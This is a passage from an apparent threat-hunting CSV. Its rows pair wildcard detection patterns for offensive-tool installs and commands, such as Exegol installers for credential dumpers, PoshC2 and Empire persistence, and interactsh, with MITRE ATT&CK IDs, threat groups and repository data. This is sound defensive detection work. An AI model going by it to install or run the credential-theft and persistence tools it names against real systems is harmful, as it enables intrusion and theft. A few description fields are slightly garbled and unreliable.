T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_evilwinrm*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_finduncommonshares*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_gmsadumper*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_goldencopy*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_gosecretsdump*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_gpp-decrypt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_hashonymize*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_impacket*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_keepwn*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_kerbrute*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_krbrelayx*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_ldapdomaindump*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_ldaprelayscan*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_ldapsearch-ad*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_lnkup*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_lsassy*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_manspider*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_mitm6_pip*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_noPac*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_ntlmv1-multi*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_oaburl*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_PassTheCert*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_pcredz*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_petitpotam*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_pkinittools*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_polenum*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_privexchange*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_pth-tools*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_pygpoabuse*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_pykek*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_pylaps*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_pypykatz*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_pywhisker*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_pywsus*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_responder*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_roastinthemiddle*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_ruler*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_rusthound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_shadowcoerce*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_smartbrute*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_smbmap*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_smtp-user-enum*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_sprayhound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_targetedKerberoast*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_webclientservicescanner*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_windapsearch-go*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_winrar_wine32.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*install_winrar_wine64.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*install_zerologon*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*installexe-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Install-Module ps2exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*install-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*install-persistence-cron*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Install-ServiceBinary*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Install-SSP -Path*.dll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Install-SSP.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Install-SSP.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1116","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*interactsh -*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C10","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*interactsh*.exe","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C9","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*interactsh*oast.*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C14","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*interactsh-client -*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting 